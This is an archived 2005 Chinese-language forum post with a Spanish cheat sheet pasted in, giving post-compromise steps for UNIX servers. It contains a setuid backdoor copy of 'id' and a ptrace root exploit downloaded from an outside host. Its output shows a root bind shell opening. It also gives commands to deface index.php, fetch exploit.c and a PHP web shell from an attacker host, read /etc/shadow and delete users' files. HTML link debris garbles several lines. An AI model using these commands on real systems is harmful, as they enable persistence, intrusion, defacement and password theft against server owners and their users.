总结UNIX成为root以后保持权限的方法

韩冰发表于 2005-2-4 23:57

by:cnbird
1.
#id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)
#cp `which id ` .
#chown root ./id
#chmod 755 ./id ; chmod u+s ./id
#ls -l ./id
-rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id*
#exit
$id
uid=500(cnbird) gid=500(cnbird) groups=500(cnbird)
$./id 
uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird)
2.利用ptrace成为root的方法
# cd /tmp/; wget <a href="http://delivered.informaticahispana.org/ptrace.c" target="_blank" >http://delivered.informaticahispana.org/ptrace.c</A>; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace
-> Parent's PID is 2313. Child's PID is 2314.
-> Attaching to 2315...
-> Got the thread!!
-> Waiting for the next signal...
-> Injecting shellcode at 0x4000e85d
-> Bind root shell on port 24876... =p
-> Detached from modprobe thread.
-> Committing suicide.....
# id
uid=0(root) gid=0(root) groups=0(root)
Para ver los dominios que hay en el server:
---------------------------------------------------------
cat /etc/httpd/conf/httpd.conf|grep ServerName << Solo salen los dominios
cat /etc/httpd/conf/httpd.conf << Unicamente los puros dominios
cat /etc/localdomains << Unicamente los dominios locales
cat /etc/trueuserdomains << Revela los verdades propietarios de cada dominio
cat /etc/userdomains << Este es el mas comun
---------------------------------------------------------
Para ver la version de kernel:
---------------------------------------------------------
uname -a <<Te sale algo asi Linux itys.host4u.net 2.4.20....., 2.4.20 viene siendo la version del kernel.
---------------------------------------------------------
Para modificar un index ya existente:
---------------------------------------------------------
echo "RootBox was OwNz You">index.php <<sobreescribe el archivo index.php con nuevo contenido
---------------------------------------------------------
Para subir, compilar, darle permisos de ejecucion y ejecutar un exploit:
---------------------------------------------------------
cd /tmp/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/exploit.c">http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/exploit.c</A> <<aqui subimos el exploit
cd /tmp/;cc exploit.c -o exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui lo compilamos con el nombre de "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado"
cd /tmp/;chmod -c 777 exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui le damos permisos de ejecucion a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado"
cd /tmp/;./exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui estamos ejecutando a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado".
Hasta aqui termina el proceso para un exploit.
---------------------------------------------------------
Ver las contraseñas encriptadas de todos los usuarios:
---------------------------------------------------------
cat /etc/shadow <<Solo funciona si tienes permisos como root.
---------------------------------------------------------
Borrar un Ficher
---------------------------------------------------------
cd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;rm import.htm<<aqui estan borrando con el comando rm, el fichero import.htm
---------------------------------------------------------
Subir un ficher
---------------------------------------------------------
cd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/shell.php<<ESTAMOS">http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/shell.php<<Estamos</A> subiendo el fichero shell.php

<CENTER></CENTER>

页: [1]

数学建模社区-数学中国's Archiver

总结UNIX成为root以后保持权限的方法